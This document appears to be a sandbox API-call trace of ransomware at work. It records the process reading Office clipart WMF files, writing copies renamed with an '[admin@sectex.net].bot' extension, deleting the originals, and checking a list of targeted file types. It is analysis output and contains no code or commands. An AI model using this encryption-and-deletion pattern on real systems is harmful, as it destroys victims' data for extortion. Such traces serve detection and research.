	[0141.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.098] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.098] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0141.099] GetLastError () returned 0x0
	[0141.099] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x2b32, lpOverlapped=0x0) returned 1
	[0141.237] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x2b40, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x2b40, lpOverlapped=0x0) returned 1
	[0141.238] ReadFile (in: hFile=0x3a4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.238] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.238] SetEndOfFile (hFile=0x384) returned 1
	[0141.238] CloseHandle (hObject=0x384) returned 1
	[0141.238] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.239] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.241] CloseHandle (hObject=0x3a4) returned 1
	[0141.241] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.258] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd20013_.wmf")) returned 1
	[0141.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.265] lstrlenW (lpString=".doc") returned 4
	[0141.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.265] lstrlenW (lpString=".docx") returned 5
	[0141.265] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.267] lstrlenW (lpString=".pdf") returned 4
	[0141.267] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.267] lstrlenW (lpString=".xls") returned 4
	[0141.267] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.267] lstrlenW (lpString=".xlsx") returned 5
	[0141.267] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.267] lstrlenW (lpString=".ppt") returned 4
	[0141.267] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.267] lstrlenW (lpString=".zip") returned 4
	[0141.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.267] lstrlenW (lpString=".rar") returned 4
	[0141.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.267] lstrlenW (lpString=".bz2") returned 4
	[0141.267] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.267] lstrlenW (lpString=".7z") returned 3
	[0141.267] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.267] lstrlenW (lpString=".dbf") returned 4
	[0141.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString=".1cd") returned 4
	[0141.268] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString=".jpg") returned 4
	[0141.268] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString=".doc") returned 4
	[0141.268] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString=".docx") returned 5
	[0141.268] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.268] lstrlenW (lpString=".pdf") returned 4
	[0141.268] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString=".xls") returned 4
	[0141.268] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.268] lstrlenW (lpString=".xlsx") returned 5
	[0141.268] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.268] lstrlenW (lpString=".ppt") returned 4
	[0141.268] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString=".zip") returned 4
	[0141.268] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.268] lstrlenW (lpString=".rar") returned 4
	[0141.268] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString=".bz2") returned 4
	[0141.268] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString=".7z") returned 3
	[0141.268] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.268] lstrlenW (lpString=".dbf") returned 4
	[0141.268] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.268] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.269] lstrlenW (lpString=".1cd") returned 4
	[0141.269] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.269] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD20013_.WMF") returned 63
	[0141.269] lstrlenW (lpString=".jpg") returned 4
	[0141.269] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.269] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.269] lstrlenW (lpString="BL00105_.WMF") returned 12
	[0141.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.337] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=880) returned 1
	[0141.337] CloseHandle (hObject=0x3b4) returned 1
	[0141.338] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf")) returned 0x20
	[0141.349] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.349] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.349] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0141.351] GetLastError () returned 0x0
	[0141.351] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x370, lpOverlapped=0x0) returned 1
	[0141.352] WriteFile (in: hFile=0x3a4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x380, lpOverlapped=0x0) returned 1
	[0141.353] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.353] WriteFile (in: hFile=0x3a4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.353] SetEndOfFile (hFile=0x3a4) returned 1
	[0141.353] CloseHandle (hObject=0x3a4) returned 1
	[0141.353] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.353] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.357] CloseHandle (hObject=0x3b4) returned 1
	[0141.357] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.357] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00105_.wmf")) returned 1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString=".doc") returned 4
	[0141.358] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString=".docx") returned 5
	[0141.358] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.358] lstrlenW (lpString=".pdf") returned 4
	[0141.358] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString=".xls") returned 4
	[0141.358] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.358] lstrlenW (lpString=".xlsx") returned 5
	[0141.358] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.358] lstrlenW (lpString=".ppt") returned 4
	[0141.358] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString=".zip") returned 4
	[0141.358] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.358] lstrlenW (lpString=".rar") returned 4
	[0141.358] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString=".bz2") returned 4
	[0141.358] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString=".7z") returned 3
	[0141.358] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString=".dbf") returned 4
	[0141.358] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString=".1cd") returned 4
	[0141.358] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.358] lstrlenW (lpString=".jpg") returned 4
	[0141.358] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.359] lstrlenW (lpString=".doc") returned 4
	[0141.359] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString=".docx") returned 5
	[0141.359] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.359] lstrlenW (lpString=".pdf") returned 4
	[0141.359] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString=".xls") returned 4
	[0141.359] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.359] lstrlenW (lpString=".xlsx") returned 5
	[0141.359] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.359] lstrlenW (lpString=".ppt") returned 4
	[0141.359] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.359] lstrlenW (lpString=".zip") returned 4
	[0141.359] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.359] lstrlenW (lpString=".rar") returned 4
	[0141.359] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString=".bz2") returned 4
	[0141.359] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString=".7z") returned 3
	[0141.359] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.359] lstrlenW (lpString=".dbf") returned 4
	[0141.359] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.360] lstrlenW (lpString=".1cd") returned 4
	[0141.360] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00105_.WMF") returned 63
	[0141.360] lstrlenW (lpString=".jpg") returned 4
	[0141.360] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.360] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.360] lstrlenW (lpString="BL00122_.WMF") returned 12
	[0141.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.360] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=10146) returned 1
	[0141.360] CloseHandle (hObject=0x3b4) returned 1
	[0141.360] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 0x20
	[0141.361] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0141.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.361] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.361] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0141.362] GetLastError () returned 0x0
	[0141.362] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x27a2, lpOverlapped=0x0) returned 1
	[0141.364] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x27b0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x27b0, lpOverlapped=0x0) returned 1
	[0141.365] ReadFile (in: hFile=0x3b4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0141.365] WriteFile (in: hFile=0x3ac, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0141.366] SetEndOfFile (hFile=0x3ac) returned 1
	[0141.366] CloseHandle (hObject=0x3ac) returned 1
	[0141.366] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0141.366] SetEndOfFile (hFile=0x3b4) returned 1
	[0141.368] CloseHandle (hObject=0x3b4) returned 1
	[0141.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0141.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00122_.wmf")) returned 1
	[0141.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.370] lstrlenW (lpString=".doc") returned 4
	[0141.370] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.370] lstrlenW (lpString=".docx") returned 5
	[0141.370] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.370] lstrlenW (lpString=".pdf") returned 4
	[0141.370] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString=".xls") returned 4
	[0141.371] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.371] lstrlenW (lpString=".xlsx") returned 5
	[0141.371] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.371] lstrlenW (lpString=".ppt") returned 4
	[0141.371] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString=".zip") returned 4
	[0141.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.371] lstrlenW (lpString=".rar") returned 4
	[0141.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString=".bz2") returned 4
	[0141.371] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString=".7z") returned 3
	[0141.371] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString=".dbf") returned 4
	[0141.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString=".1cd") returned 4
	[0141.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString=".jpg") returned 4
	[0141.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.371] lstrlenW (lpString=".doc") returned 4
	[0141.371] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString=".docx") returned 5
	[0141.371] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0141.371] lstrlenW (lpString=".pdf") returned 4
	[0141.371] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0141.371] lstrlenW (lpString=".xls") returned 4
	[0141.372] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0141.372] lstrlenW (lpString=".xlsx") returned 5
	[0141.372] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0141.372] lstrlenW (lpString=".ppt") returned 4
	[0141.372] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0141.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.372] lstrlenW (lpString=".zip") returned 4
	[0141.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0141.372] lstrlenW (lpString=".rar") returned 4
	[0141.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0141.372] lstrlenW (lpString=".bz2") returned 4
	[0141.372] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0141.372] lstrlenW (lpString=".7z") returned 3
	[0141.372] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0141.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.372] lstrlenW (lpString=".dbf") returned 4
	[0141.372] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0141.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.372] lstrlenW (lpString=".1cd") returned 4
	[0141.372] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0141.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00122_.WMF") returned 63
	[0141.372] lstrlenW (lpString=".jpg") returned 4
	[0141.372] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0141.372] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0141.372] lstrlenW (lpString="BL00130_.WMF") returned 12
	[0141.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0141.373] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=1464) returned 1
	[0141.373] CloseHandle (hObject=0x3b4) returned 1
	[0141.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf")) returned 0x20
	[0141.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00130_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00130_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
